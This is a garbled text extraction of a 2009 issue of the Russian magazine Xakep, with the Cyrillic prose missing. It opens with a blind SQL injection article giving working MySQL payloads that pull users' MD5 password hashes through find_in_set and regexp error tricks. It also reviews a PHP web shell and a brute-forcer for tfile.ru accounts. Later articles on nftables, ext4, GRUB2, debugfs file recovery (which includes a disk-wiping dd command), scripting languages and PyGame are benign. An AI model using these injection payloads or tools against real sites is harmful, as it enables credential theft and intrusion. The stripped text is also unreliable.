HTTP://WWW
links
https://forum.
antichat.ru/
thread43966.html
SQL Injection.
dev.mysql.com/
sources/doxygen/
mysql-5.1/
regerror_8c-source.
html
MySQL,
regexp.
dev.mysql.com/doc

MySQL ().
ru.wikipedia.org/
wiki/_ !
WARNING
warning
!
! ,

!
1) [0,1,2,3,4,5,6,7,
8,9,a,b,c,d,e,f]; '8'
2) , 'b'
, '8'? ( )
3) ,
[8,9,a,b,c,d,e,f]; ''
4) , 'b'
, ''? ( )
5) ,
[8,9,a,b,c]; 'a'
6) , 'b' ,
'a'? ( )
7) ,
[a,b,c];
'b'
8) , 'b'
, 'b'? ( )
9) , ,
= 'b'
,
, 5-6
. ,
. 160-170
MD5-. ,
, ?
FIND_IN_SET()

find_in_set(str,strlist) , ',' ,
. :
mysql> SELECT FIND_IN_SET('b','a,b,c,d');
-> 2
:
select find_in_set((substring((select
password from users limit 1),1,1)),'0,1,2,3,4
066
,5,6,7,8,9,a,b,c,d,e,f');
'0,1,2
,3,4,5,6,7,8,9,a,b,c,d,e,f'. , 'b',
12.
, ?
, -
, . SQL- . ,
, , , id, ,
? ,
MD5, :
news.php?id=find_in_set(substring((select
passhash from users limit 0,1),1,1),'0,1,2,3,
4,5,6,7,8,9,a,b,c,d,e,f')
, '0,1,2,3,4,5,6,7
,8,9,a,b,c,d,e,f', id,
.
:
1) id
2) find_in_set

3) , id

, MD5- 16
id, , 32
. ,
48 ,
16
. +toxa+
madnet. , find_in_set

LOCATE(),INSTR(),ASCII(),ORD(). , ASCII() ORD()
,
MySQL. ,
. ,
,
.
,

, . ,
.
X 07 /127/ 09
>>
FIND_IN_SET() +
MORE1ROW
, ,
, ,

, .
. , Elekt' ][ #111,
Subquery returns
more than 1 row. , SQL
SQL-. ,
, :
SELECT 1 UNION SELECT 2
,
#1242 Subquery returns more than 1 row
ZaCo ,
:
"x" regexp concat("x{1,25", if(@@version<>5,
"5}", "6}")
, MySql 5,
:
#1139 Got error 'invalid repetition
count(s)' from regexp.
MySql ,
9 ,
regexp. , 11 +
1 , :
SELECT 1
No error
select if(1=1,(select 1 union select 2),2)
select 1 regexp if(1=1,"x{1,0}",2)
count(s)' from regexp
select 1 regexp if(1=1,"x{1,(",2)
#1139 Got error 'braces not balanced' from
regexp
select 1 regexp if(1=1,'[[:]]',2)
#1139 Got error 'invalid character class'
from regexp
select 1 regexp if(1=1,'[[',2)
#1139 Got error 'brackets ([ ]) not balanced'
from regexp
select 1 regexp if(1=1,'(({1}',2)
#1139 Got error 'repetition-operator operand
invalid' from regexp
select 1 regexp if(1=1,'',2)
select 1 regexp if(1=1,'(',2)

#1139 Got error 'parentheses not balanced'
from regexp
select 1 regexp if(1=1,'[2-1]',2)
#1139 Got error 'invalid character range'
from regexp
select 1 regexp if(1=1,'[[.ch.]]',2)
#1139 Got error 'invalid collating element'
from regexp
select 1 regexp if(1=1,'\\',2)
#1139 Got error 'trailing backslash (\)' from
regexp
.
find_in_set.
, ,
0.
:
select * from users where id=-1
AND "x" regexp
concat("x{1,25",
if(
find_in_set(
substring((select passwd from users where
id=1),1,1),
'a,b,c,d,e,f,1,2,3,4,5,6'
)>0,
(select 1 union select 2),
"6}"
)
)
INFO
info

,

INSERT,
UPDATE .
DVD
dvd

SQL-
.
, 'a,b,c,d,e,f,1,2,3,4,5,6', :
, :
#1139 Got error 'empty (sub)expression' from
regexp
X 07 /127/ 09
067
>>
BLIND SQL
INJECTION
count(s)' from regexp

, ! , .
, .
MD5. ,

[0-9,a-f]. , ,

, .
MD5
, , :
[01]:
[02]:
[03]:
[04]:
[05]:
[06]:
[07]:
[08]:
[09]:
[10]:
[11]:
'0','b','c','d','e','f'
'1'
'2'
'3'
'4'
'5'
'6'
'7'
'8'
'9'
'a'

, , . ,
02-11,
.
01,

:
[01]:
[02]:
[03]:
[04]:
[05]:
[06]:
'0'
'b'
'c'
'd'
'e'
'f'
:
1.
068

2.

3.
,

4.
, ;
, , 2
.
, ,
, .
,
"x" regexp concat("x{1,25", if(@@
version<>5, "5}", "6}")
,
.
,
if,
regexp }.
,
, :
#1139 Got error 'repetition-operator operand
invalid' from regexp.
,
select 1 regexp if(1=1,'',2) ,
Got error 'empty (sub)

expression' from regexp, ,
,
regexp : 'a|', '|' . ,
,
.
, MD5-
:
sql.php?id=1+AND+"x"+
regexp+concat("x{1,25",+(if(find
_in_set(substring((select+pass+fro
m+users+limit+0,1),1,1),'0,c,d,e,f
,1,2,3,4,5,6,7,8,9,a'),
(if(find_in_set(substring((select+
pass+from+users+limit+0,1),1,1),'0
,c,d,e,f,1,2,3,4,5,6,7,8,9'),
,c,d,e,f,1,2,3,4,5,6,7,8'),
,c,d,e,f,1,2,3,4,5,6,7'),
,c,d,e,f,1,2,3,4,5,6'),
,c,d,e,f,1,2,3,4,5'),
,c,d,e,f,1,2,3,4'),
,c,d,e,f,1,2,3'),
,c,d,e,f,1,2'),
,c,d,e,f,1'),
,c,d,e,f'),
('}'),
(select+1+union+select+2))),
'}x{1,0}')),
'}x{1,(')),
'}[[:]]')),
'}[[')),
'}(({1}')),
'}|')),
'}(')),
'}[2-1]')),
'}[[.ch.]]')),
'}\\')))
+--+1
, ,
'0,c,d,e,f', Subquery returns
more than 1 row,
1. 'invalid repetition
count(s)', '2'. .
, ,
11
,
. ,
Blind SQL Injection.
MD5-
42 , ,
, .
, 4 ,

,
32 . 1
1 .
.
, SQL-
,
,

OUTRO
, SQL-.
. , . ,
, ,
, ,

.z
X 07 /127/ 09
>>
R0ID
/ R0ID@BK.RU /
>>

:PHPREMOTEVIEW
: *NIX/WIN
:DMITRY BORODIN

-.
( )
.
phpRemoteView. -,
explorer-
:
1. :
HTML- ( )
Plain- ( )
PHP-
jpeg/jpg/gif/png
2. :
( )
( )
( )
3. :

,
(
)

/

/
Base64

( 0
)
( )
(-
070

)

4. :
: /
phpinfo()
PHP-
eval()
(shell)
MD5-
Base64
MD5- (
6-7 )
/ unix
timestamp, mktime()

cp1251, koi8-r, etc
:
$write_access
//
. False , True

$phpeval_access phpeval().
True , False
$system_access
(shell). False
, True
, :
$login (false, )
$pass
$host_allow
(
* )
, , ,

.
: TFILE.RU BRUTER/
CHECKER/PARSER
: *NIX/WIN
: MAILBRUSH

-
-,
:). ,
- tfile.
ru ( ;
, ) :
, .
. :
1. TFile.RU Parser PHP-
.
:
ID ;
;
.
2. TFile.RU Bruter PHP-
tfile.ru.
, -,
: :. bad-
, good-
.
3. TFile.RU Checker PHP-, good- , / :
username: upload: X download: X rating: X
: upload: X download: X rating: X.
mailbrush' :).
P.S. , ,

!
: FAST WEB SERVER

: WINDOWS 2000/XP/2003
: KNOKSWILLE
- PHP, .
.
-,
, Denwer'
TopServer'.

Fast Web Server
, Knokswille.

X 07 /127/ 09
>>
nginx, mod_security
.
,
.
:
: nginx 0.6.35, Apache 2.2.4,
PHP 5.2.4, Zend Engine 2.2.0, MySQL
5.0.45, phpMyAdmin 2.6.1, Sendmail
: Nginx frontend +
Apache backend
GET/POST-
mod_security ( )
XSS/
SQL-

(
nginx/0.6.35, Red Hat Enterprise
Linux 5.3)
GNU/GPL
Visual C++ 2008

Redist ( mod_security)
SQLInfo (
MySQL)
. :
1. C:\nginx\conf\nginx.conf. :
listen 192.168.94.105:80; # IP
server_name adsbss 192.168.94.105;
#
2. C:\nginx\server\usr\local\apache\
conf\httpd.conf. :
RPAFproxy_ips 192.168.94.105
127.0.0.1 #, 192.168.94.105 IP
3. -
:
C:\nginx\server\home\custom\www
:
IMAP POP3: IMAP POP3-
HTTP-
SMTP: HTTP-
SMTP-
:
1. POP3: USER/PASS, APOP, AUTH LOGIN/
PLAIN/CRAM-MD5;
2. IMAP: LOGIN, AUTH LOGIN/PLAIN/
CRAM-MD5;
3. SMTP: AUTH LOGIN/ PLAIN/CRAM-MD5;
SSL
HTTP-:
, X 07 /127/ 09
Fast Web Server

IP-/
keep-alive pipelined

IP
(Basic-)
PUT, DELETE, MKCOL,
COPY MOVE

SSL

.
, ,
-

:).
: HUMAN EMULATOR
:WINDOWS XP/VISTA
: HUMANEMULATOR.INFO
:

,

. :
/

//
,
,
. , :
AJAX

( , etc)
/

PHP-,
. http://xanga.com,
:
:)
<?php
//
Human Emulatora
require("../../Templates/xedant_
human_emulator.php");
//
$browser->navigate("http://www.
xanga.com/register.aspx");
$browser->wait_for(240,1);
//
//
$input->set_value_by_
number(0,"admygteryrtin1");
//
number(1,"rte34otu2");
//
number(2,"rte34otu2");
//email
number(3,"ad456435min1@host.com");
//
$captcha=$app->dlg_captcha_from_
image_number(1);
number(4,$captcha);
//
// 1
$listbox->select_num_value_by_
number(1,1);
//
number(0,5);
// 1980
number(2,51);
// " "
$checkbox->set_checked_by_
number(0,"true");
//
$button->click_by_number(0);
$browser->wait_for(240,1);
//
$app->quit();
?>
256 , 50
Win XP/Vista,
PHP :).
P.S. ,
, ? :). z
071
>>

IT-

-
Fog Creek Software
072
X 07 /127/ 09
>>

, 44
. , Microsoft, IT-, , , ,
web 2.0 .

.
: High tech. Low life ( . )
, .

.
, ,
IT,
.
IT-
, ( ),
,
.

5-10 ,
, ,
, .

.
.
, ,
,
X 07 /127/ 09
.
, ,
,
.
, - Microsoft,
,
Joel on Software,

.

,
,

. , , ,
,
.
,
, ,
,
, . -
,
1965 , , -,
15 . ,
, , ,
, ,
. , .
15,
, .
,
.
, ,
. , , ,
,
, 1978
IBM-360,
-. , 15-
, , ,
.
,
. ,

, .

073
>>
STACK OVERFLOW. 10
:)
SERVER FAULT,
STACK
OVERFLOW
,
.
-
, , Nachal. ,
,

, Oranim.
,
. ,

.

, ,
. ,
, ,
,
, .
, ,
Excel. ,
,
Excel macro
(XLMs) Excel Basic,
Visual Basic. Visual Basic .
,
, Microsoft
,

- . ,
. , . , -, ,
-, Microsoft.
,
, , .
,

, . Microsoft, , .
4 ,
1995.
,
, . ,
- - ,
IT-, ,
, .
Microsoft
,
Viacom
Interactive Services Juno Online Services.
,
Video
& Audio Communications. ,
, Paramount DreamWorks,
,
MTV. -
. ,
, ,
.
,
Juno Online Services
.
,
,
,

. ,
-
,
MICROSOFT
, ,
,
, (, , ,
).
.
,
,
.
, ,

. -
1991 ,
.
, , - .
. , ,

, , ,
Microsoft. ,
Microsoft,
, , , MS
, Windows 3.1
3.0, Microsoft Office,
95-.
Microsoft
-
074

.

, ,
.
-
- , ,
(, ,
IT-). , :
!, . :
, , .

Juno, 2000-
.
. ,
Juno Online Services.

, ,

Make Magazine.
.
6 ,
:
6 , . ,

Fog Creek Software. ,
2000 .
,
.

-, ,
, .
X 07 /127/ 09
>>
FOG CREEK
,
( ,

). , , ,
. ,
,
,
,
Fog Creek Software 6
.
, :
Profit!.

Fog Creek Software?
,
,

.
Fog Creek .
, 2000
, IT
.
.

, . 2001 Fog Creek
FogBugz
CityDesk. FogBugz
,
, ,
.
- FogBugz . CityDesk, ,
CMS- (content management system,
,
). FogBugz,
, . CityDesk 2003 ,
, ,
.

Joomla, , ,
.
X 07 /127/ 09
FOG CREEK !
Fog Creek
Fog Creek Copilot:

. - Fog
Creek . ,

, , .
,
(
,
).

Fog Creek ,
.
, ,
, , , . ,

2000
,
http://www.joelonsoftware.com.
, , , : ,
.
, ,
,

. ,

.
, Joel on Software

IT-

. ,
42 (
), .
PR-, , ,
Fog Creek Software.

.
.
,
.
( , , )
.

Fog Creek . ,
- ,
Stack Overflow
(http://www.stackoverflow.com).
Digg
Wikipedia --.
,
.
. , ,
,
,
, ,
.
( Digg), ,
( , Wiki)
- anonymous
Stack Overflow .
- Stack Overflow Server
Fault (http://www.serverfault.com)
, , ,
, .
, Server Fault
Stack Overflow.
OpenID. , ,
- , .
, ,

, .

. z
075
>> unixoid

/ ZOBNIN@GMAIL.COM /

Linux
>> unixoid
Linux . . , , ,
. , ,
. Linux. .

Linux . 2.0
BSD-
ipfw
ipfwadm. 2.2
ipchains.
2.4 , ,
netfilter/iptables. Netfilter
: ;
, , , , ;
(stateful
firewalling).
, , stealth-;

. ,
076

iptables.

,
iptables, :
, . netfilter

,
pf
iptables ( ferm, ferm.foo-projects.org).
,
. Patrick McHardy,

netfilter,
. ,
(
,
, ,
, ,
).
nftables ,
:
1. , .
2. nft.
3. libnl,
nft netlink.
nft (
,
),

. nftables, ,

.
nft , , ,
.

X 07 /127/ 09
>> unixoid
EXT4 BONNIE++
EXT4 IOZONE
.
:

nftables
include "ipv4-filter"
chain filter output {
ct state established,related
accept
tcp dport 22 accept
counter drop
}

,
OpenBSD:
# nft add rule output tcp dport 22
log accept

.

nft.
, .
,
,
..
iptables, nft

.
,
X 07 /127/ 09
,
.

Linux

,

ext3.
ext3
Linux. ext2,

. ext,
, Linux.
(
,
2
).

ext ( 2006)

. 5
ext4
Linux 2.6.19, .

, 2.6.28
(25 ) ext4

.
-
ext4

, .
ext4,
:
48- .
ext3 16
, ,

. ext4
48-
1 (1 = 1048576
) 16 .

. ext3
,
.
,
.

. :
.
,
.
ext4 .
,

,
. , ext3
10 ,
ext4
. ext4
.
.

. ext3

,
.
ext3
. ext4
077
>> unixoid
TOMOYO LINUX
,
,
.
.
. ext3, , ext4 . ,
write(),
, ext4
.
sync(), . .
.
,
. ,
p2p- ,
.
, .
libc posix_fallocate(), , , .
ext3 ext4
.
.
inode. inode 128 256
,
( )
inode . , ACL, SELinux, Samba
3-7 .
inode. inode,
. inode.
inode. ext4
inode, fsck

.
2 20 , .
. ext4
. ext3,

.
-.

.
e4defrag,
, .
. ext3 32000.
.

, ext4
. ext3
ext4, .
GRUB
.
Linux ,
LiLo.
GNU/Hurd grub,
MS-DOS.
grub
,
, ,
. grub2.
, :
, , ,
.
.
(
, ).
.
. -ASCII ,
gettext, , ..
( ).
, , - , , ,
, , .
- ( grub ).
.
Stage 1.5.
grub1, (, ).
grub2 Unix ,
,
. Matt Ranon

. ,
Linux. Kcli libcli
,
Linux .
078
X 07 /127/ 09
>> unixoid
GRUB2
.
. : /boot/grub/grub.cfg ,

update-grub.

(memtest86, ) .

, .
Stage 1.5 ( , ), ,
, grub
.

DEBIAN
BSD-, ,
Linux , . ,
Linux,
, ,
.
,
(
). Debian ,
Linux
.
, Linux, glibc
(GNU C Library),
,
. eglibc
glibc,
,
.
Debian.
:
.
X 07 /127/ 09
, ( glibc
,
).
(glibc
).

(glibc bash).

( gcc -Os).
,
.
eglibc
glibc
OpenWrt (openwrt.org).

2006 Novell

. AppArmor ,
SELinux. ,
, AppArmor
SELinux, Novell

.
AppArmor
Novell.
. , , ( ,
SELinux).
, ,
LSM (Linux Security Modules) .
Linux- Novell
,
.
,
, -
INFO
info

,

ext4 ,

btrfs,
,
Linux
.

, Linux- 2.6.29
, ,
Documentation/
logo.svg.
079
>> unixoid
EXT4
, ,
. ext4 Ubuntu. :
,

150 . , .
ext4 , ,
(XFS, Reiser4),
,
sync() .
emacs,
ext4.
EXT4FS
, ext4 .
:
ext3-
ext3 ext4! :
# tune2fs -O extents,uninit_bg,dir_index /dev/_
.
ext4, LiveCD.
:
# fsck -pf /dev/_
:
# mount -t ext4 /dev/_ /_
# mount -t ext4 /dev/disk/by-uuid/UUID- /_
/etc/fstab,
ext4:
UUID=UUID-
ext4
defaults,errors=remount-ro,relatime
ECLIPS-
TOMOYO LINUX
0 1
,
/boot/grub/menu.lst
rootfstype=ext4 .
:
title
Linux
root
(hd0,1)
kernel
/boot/vmlinuz-2.6.28.1 root=UUID=879f797c-
944d-4c28-a720-249730705714 ro quiet splash

rootfstype=ext4
initrd
/boot/initrd.img-2.6.28.1
quiet
(dhsilabs@mail.ru, www.dkws.org.ua),
, Linux.
TOMOYO LINUX
.
MAC- TOMOYO Linux (elinux.org/TomoyoLinux).
,
, - 2.6.30. TOMOYO Linux
AppArmor, .
080
,
, SELinux.
,
2.6.30, IBM. .
SELinux Slim (Simple Linux
Integrity Module ,
IBM).
, .

LiveCD ,
. z
X 07 /127/ 09
>> unixoid

INODE
...
HATCHET
/ MAKS.HATCHET@YANDEX.RU/
Linux
>> unixoid
,

.
.
.
ext2 ext3. ,
. Linux .
,
.
,
ext2/3,
,
rm.
, .

EXT2/EXT3
boot- 1024 .

(, Grub Stage 1.5).
-,

( ).
-,
:
082
# tune2fs -l /dev/hda1
,
,
, .
Block size, , ,
4096, 4 .
,
. ,
, ,
,
,
.
Block count,
Free blocks.
-
(), .
inode ,

.

ext2_inode,

( Inode
Count -).

, (, ,
..), , /
, / /
/ /,
.
ext2_inode,
, source/
include/linux/ext2_fs.h :
inode
struct ext2_inode {
/* */
__u16 i_mode;
/* UID */
__u16 i_uid;
/* */
__u32 i_size;
/* */
__u32 i_atime;
X 07 /127/ 09
>> unixoid
.
,
.
,
,
. ext2_dir_entry_2
( ext2_dir_entry ),
:

struct ext2_dir_entry_2 {
/* inode */
__u32 inode;
/* */
__u16 rec_len;
/* */
__u8 name_len;
/* */
__u8 file_type;
/* */
char name [EXT2_NAME_LEN];
};
#define EXT2_NAME_LEN 255
- DUMPE2FS
/* */
__u32 i_ctime;
/* */
__u32 i_mtime;
/* */
__u32 i_dtime;
/* GID */
__u16 i_gid;
/* (0
) */
__u16 i_links_count;
/* , */
__u32 i_blocks;
/* */
__u32 i_flags;
/* */
union osd1;
/* */
__u32 i_block [EXT2_N_BLOCKS];
/* (
NFS) */
__u32 i_version;
/* ACL- */
__u32 i_file_acl;
/* ACL- ( ) */
__u32 i_dir_acl;
/* */
__u32 i_faddr;
/* */
union osd2;
};
#define EXT2_DIR_BLOCKS 12
X 07 /127/ 09
#define EXT2_IND_BLOCK EXT2_DIR_

BLOCKS
#define EXT2_DIND_BLOCK (EXT2_IND_
BLOCK + 1)
#define EXT2_TIND_BLOCK (EXT2_DIND_
BLOCK + 1)
#define EXT2_N_BLOCKS (EXT2_TIND_
BLOCK + 1)

i_block, 12 32-
12 .
.
, (
).
,
( ). , ,
15
,
.
( )
ext2 ext3.
,
.

,
, .

open() creat() ,
inode inode-
.
ext2_dir_entry_2,
( name),
(file_type)
inode . ,

, , .

() .

,
inode
ext2_dir_entry_2.
inode inode-
(i_links_count)
.
, (
);
,
.

.
, inode .
, inode

( rec_len).
,
. , inode

.
,
,
083
>> unixoid

. inode,
,
. ,
ext2 inode,
,
!
ext3 :
(i_block),
,
.
EXT2/3

INFO
info

ext2

debugfs.

LDE
(Linux Disk Editor, lde.
sourceforge.net).

ext2
UFS (Unix
File System),

,

BSD-.

,

ext2 ext3,

: TestDisk
(www.cgsecurity.
org/wiki/TestDisk),
undelete (www.stud.
tu-ilmenau.de/~mojo/
undelete.html)
sleuthkit (www.
sleuthkit.org).
084
, . ,
RESET
LiveCD.

,
, . debugfs
e2fsprogs.
,
:
$ debugfs /dev/sda1
,
. help, . : lsdel, stat, cat dump. lsdel
inode. :
debugfs: lsdel
, ,
:
$ echo lsdel | debugfs /dev/sda1 > /tmp/lsdel.
out
, ,
. inode stat
debugfs:
-p , . ,
.
,
cat inode,
:
debugfs: cat <_inode>
,
file strings.
, ,
.

,
inode-. . ( ) :
# debugfs -w /dev/sda1
inode :
debugfs: mi <_inode>
mi modify inode inode.

inode , .
, ,
, <Enter>.
: (Deletion time)
(Link count). ,
1. ,
:
, ( , inode, ).
, .
fsck,
, lost+found:
# e2fsck -f /dev/sda1
:
, link
debugfs:
debugfs: link <_inode> _
debugfs: stat <_inode>
inode (,
, , .).

, , .
, dd
. .
dump ,
inode, .
:
debugfs: dump -p <_inode> /tmp/_
. e2fsck ,

.
EXT3?
, Linux- ext3
.
inode,
, . . , .
,
X 07 /127/ 09
>> unixoid
DEBUGFS: INODE
-
DEBUGFS: INODE
. - (, , ) ,

, (id3- mp3, ).
,
. HTML, DOC
,
,
.
, ,

. ,
, ,
,
( ),

dd.
(, ,
). 99%
;
,
,
.
,
.
,
.
90-
,
.

, . ,
,
( ), .
! ,
,
, grep:
# grep -a -B1 -A200 'root:x:0' /dev/sda1
X 07 /127/ 09
- , e2fsck
,
, ext2. ,
- ext2 ext3 ,
.
ext2 ext3
- ( ),
-. -
, .
, - ,
4 , 4096*8=32768,
65536 ..
-
e2fsck:
HTTP://WWW
links
www.xs4all.
nl/~carlo17/howto/
undelete_ext3.html
,

ext3.
# e2fsck -b 32768 /dev/sda1
. , ,
-.

, ,
,
. , ,
; ext3, inode.
, , ,
,
-
. , :

sync ,
,
:
$ dd if=/home/yulya/__.
mp3 of=/home/vasya/_
$ sync
$ rm /home/vasya/_
$ sync
/dev/
zero /dev/random, .
( ,
):
$ dd if=/dev/zero of=/dev/sda1
085
++++
>> coding
++++
++++
++++
2
LAMP
++++
3
LAMP
LAMP
++++
++++
++++
++++

/ AKRASNOSCHEKOV@GMAIL.COM /
++++
++++
++++

Python, PHP Perl?
LAMP
++ ++
. ,
, : LAMP=Linux+Apache+MySQL+PHP/Python/Perl , , .
( , ),
.
++++
PHP A.K.A.
++++
++++
++++
++++
++++
PHP ( , Personal Home Page

PHP: Hypertext Preprocessor) ,
web-. PHP , ,
( ) .
PHP web-,
web . ,
-
086
, PHP-
web. .
PHP , <?php
... ?> ,
. $
.
,
C.
:
. : var
<?php
$a = 'var';
$b = 'iable';
$variable = 'var';
echo ${$a.$b};
?>
( 20 .)
PHP,
, Wikipedia, Yahoo!, Facebook,
X 07 /127/ 09
>> coding
Digg, WordPress, YouTube. PHP
, ,
HTML-.
PHP
HTML-
.
, PHP ( ), .
PHP,
,
, ,
.
PHP National
Vulnerability Database: 35.87%(!)

PHP.
PHP
,
:
if (!isset($foo{5})) { echo "Foo is
too short"; }
(, )
,

.
Python
. :
, ,
. , , ,
. , Python

( ).

. ,
Python
,
( , ++,...) (
Delphi) -, .

(if, def, for, try ...), a
.
Python.
def qsort(L):
if L == []:
return []
pivot = L[0]
:
if (strlen($foo) < 5) { echo "Foo is
too short"; }
return (qsort([x for x in L[1:] \

if x < pivot]) + [pivot] + \
qsort([x for x in L[1:] \
if x >= pivot]))
:
$keys = array("apples"=>1,
"oranges"=>1, ...);
if (isset($keys['mangoes'])) { ... }
,
:
$keys = array("apples", "oranges",
...);
if (in_array('mangoes', $keys)) {
... }?>
PHP , .
: PHP
. : , ,
.
PYTHON A.K.A.
.
(, ,
),
. .
1,5 . , Python
, . Python
, ,
, . Python X 07 /127/ 09
Python
, 3D- (Maya, Softimage XSI,
Blender) (GIMP,
Inkscape, Scribus, Paint Shop Pro).
.

:
def decorator1(func):
return lambda: func() + 2
def decorator2(func):
def print_func():
print func()
return print_func
, :
@decorator2
@decorator1
def function():
return 62
... , function() 64
, Python Google, Yahoo!, CERN NASA,
,
. ,
, ,

( ).

20 PHP/MySQL Python,
, .
PHP ,
,
web- PHP, Python
, , .
, PHP Python,
, PHP
Pythona . ,
, :
Python,
.
: ,

web-.

:
( ) Python,

PHP?. :
Pythone
30%,
0.67% , 36% PHP
(Python :)).
PERL A.K.A
Perl
.

, , web-, , GUI.
Perl, , (
, ),
. (, Python
PHP), ( ),

.
Perl.
,
perl -wle '(1 x $_) !~ /^(11+)\1+$/
&& print while ++ $_'
Perl - .
Perl
. Perl

. Perl
. Perl ,
Python, PHP,
.
087
++++
++++
++++
++++
++++
>> coding
.
. HEAPAR SOFTWARE CYD
SOFTWARE LABS
,
Python?
?
, PHP? PHP ?
Python,
, , . ...
-, PHP .
Python , PHP -, -.
PHP , , MVC , ... Python + Django ( -
) , , , , ,
, :).
Python , .
. ,
, ? :
, Python;
PHP;
;
- (, ) PHP.
. Python . ,
, . ,
-, , .
IMHO, PHP .
,

. 10 ( ),
8 PHP ASP.NET. 8
, ? , .
,
PHP.
Yahoo ,
. - 50%
, , . ,
,
. PHP
, .
-
,
. ,
PHP .
Web 3.0 Web 4.0, .NET Java,
.
,
.
PHP , ,
.
,
PHP. ( )
PHP ,
, CMS,
LAMP PHP .
SPIRIT ,
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
++++
++++
++++
++++
088
X 07 /127/ 09
>> coding
FORB
,

, Perl?
?

1. :
2. - :
$array[@array] = 'What to add';
, Perl .

. , , web
PHP,
Perl.
, Perl
.
. ,
.
Perl 1999 ,

.
,
Perl.
3. "ThisTextWithoutSpaces" "This
Text Without Spaces":
$text =~ s/([a-z])([A-Z])/$1 $2/g;
Perl , . ,

,
, ,
.
web-,
Perl.
web-, -,
. ,
, .
Perl, , , . , PHP.
web- Perl, bbc.co.uk, Amazon.com, LiveJournal.
Perl ( ) 9.54%
, ,
.
? ?
,

, ,
/ . ,

( http://shootout.alioth.debian.org/gp4).
-
,
, ( )
,
.NET JSF.
, PHP-
Pythona, , P:
;
;
;
;
;
(PHP Symfony, php.
MVC; Python-Django, CherryPy, Pylons; Perl -Catalyst,
CGI::Application, Gantry);
, P
.z
X 07 /127/ 09
INFO
$#array /= 2;
info

,
P,

,
web
.
HTTP://WWW
links
www.php.net
www.perl.org
www.python.org
DVD
dvd

web-:
Symfony 1.2.7 (PHP),
Django 1.0.2 (Python)
Catalyst 5.80003
(Perl).
089
++++
>> coding
++++
DOUBLE BUFFERING
SPIRIT
++++
/ HTTP://TUTAMC.COM /
1. DRAW
++++
graphics
image Back Butter
++++
2. Biit
(copy)
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
++++
++++
++++
image Back Butter
PYTHONA
PyGame
.
, , , ! ,
- ,
.
PyGame.
PyGame .
,
++
DirectX, , ,

. ,
.
PyGame . , , , .
,
PyGame
- .

PyGame
++++
090
,
SDL-
.
,

Python. Pete Shinners.
PyGame
, .
. ,
,
,
.
, .
,
.
, -
.

, , ,
300 , .
PyGame,
.
,

PyGame Windows
,
http://www.pygame.org
. Linux PyGame
. , ,
Python 2.5 (

X 07 /127/ 09
>> coding
,
, .

. general General.
:
PYGAME
). , .
Pythone, PyGame
:
import pygame
from pygame.locals import *
, pygame.locals
,

. , , , .
PyGame 640x480
][:
pygame.init()
pygame.display.set_mode((640, 480))
pygame.display.set_caption(
'][akep')

, (surface) ,

pygame.display.get_surface().
.
.
:
pygame.draw.line(window,(10,100,
100),(10,200),(20,300),2)
window ,
;
(R,G,B), (X,Y), , ,
. , !
,
line aaline.
, .
,
.

,
PyGame
,
,
,
,
pygame.display.flip().
import pygame
from pygame.locals import *
pygame.init()
X 07 /127/ 09
PYGAME
window = pygame.display. \
set_mode((640, 480))
'][akep')
pygame.draw.aaline(window,
(10,100,100),(10,200),(20,300),2)
pygame.display.flip()
while 1:
pass

: ,

.
pygame.event.
get(), ,
.
:
while 1:
for event in pygame.event.get():
if event.type == QUIT:
sys.exit()
, :),
.
, , KEYDOWN KEYUP.
,

Esc, :
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
sys.exit()
, event.key,
Esc
.
, , -
Enter,
key 13
Entera.
-,

,
-.
class General():
level = 0
def __init__(self):
pygame.init()
pygame.display.set_mode(
(640, 480))
'][akep')
def event(self,event):
if event.type == QUIT:
sys.exit()
if event.type == KEYUP:
if event.key == K_ESCAPE:
self.location = exit_location
,
,
exit_location.
,
Location:
class Location(object):
def __init__(self):
self.window = pygame.display.\
get_surface()
pass
def draw(self):
pass
,

. ,

( ):
general = General()
start_location = Start_location()
game_location = Game_location()
exit_location = Exit_location()
general.location = start_location
clock = pygame.time.Clock()
while 1:
for event in pygame.event.get():
general.location.event(event)
general.event(event)
general.location.draw()
pygame.display.flip()
clock.tick(30)
,
general-. -
091
++++
>> coding
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
++++
++++
++++
++++
PYGAME.

PyGame 2000 .
- , Python SDL. SDL (Simple Directmedia
Library) Sam Lantinga
- .
.
, , Python SDL,
. PyGame 2000
, 6 1.0.
: start_location ,
game_location , exit_location
. general.location , .

, .
draw . ,
. clock.tick(30).
, 4- CoreDuo
, - :).
FPS 30. ,
,
1/30 . , FPS, ,
. , :
class Start_location(Location):
def __init__(self):
Location.__init__(self)
self.background = pygame.image.load('f.png')
def draw(self):
self.window.blit(self.background, (0, 0))
if event.type == KEYDOWN:
if event.key == 13:
general.location = game_location
pygame.image.load('f.
png'), , , . draw
. blit
( ), , .
<Enter>,
.
.
Exit_location ,
( ). Game_location
. .
,
. 2D-,
, 3D , , ( )
. ,
, (
), ,
. PyGame
pygame.sprite.Sprite. :
class Kamen(pygame.sprite.Sprite): speed = 1
status = 0 # 0-down,1-left,2-right
def __init__(self):
pygame.sprite.Sprite.__init__(self)
image = pygame.image.load('kamen.png').convert()
image.set_colorkey(image.get_at((0,0)), RLEACCEL)
self.image = image
self.rect = image.get_rect()
def update(self,args):
# ,
self.rect.x = newX
self.rect.y = newY
, , , . , .
, ,
set_colorkey, , .
, . png , convert()
convert_alpha(). ,
:),
Paint, .
.
pygame.sprite.Group.
:

( ,
http://www.xakep.ru/magazine/xs/064)
1989 .
, .
60,
, , .
: (,
, , ,
092
).
() ,
. ( 0)
,
. . ,
, . , , 14-
:).
X 07 /127/ 09
>> coding
PYGAME
kamens = pygame.sprite.Group()
for i in xrange(0,3):
kamens.add( Kamen() )
, ,
kamens.update(args),
update .
draw,
,
:
kamens.draw(window)

Game_location, draw:
def draw(self):
self.window.blit(self.background, (0, 0))
self.kolobok.draw(self.window)
self.kamens.update()
self.kamens.draw(self.window)
for kamen in pygame.sprite. \
spritecollide(self.kolobok,self.kamens,0):
general.location = exit_location
,
. , ,
, . , ,
pygame.sprite.spritecollide()
, - .
,
, exit_location.

, ,
!
pygame.key.get_pressed(),

. ,
. :
keys = pygame.key.get_pressed()
if keys[K_LEFT]:
self.left()
if keys[K_RIGHT]:
self.right()
if keys[K_UP]:
self.up()
if keys[K_DOWN]:
self.down()
. ,
X 07 /127/ 09
- !
:
pygame.mixer.music.load('s.mp3')
pygame.mixer.music.play()
mp3-
.
. ,
:
if event.type == KEYUP:
if event.key == K_m:
if self.music:
pygame.mixer.music.pause()
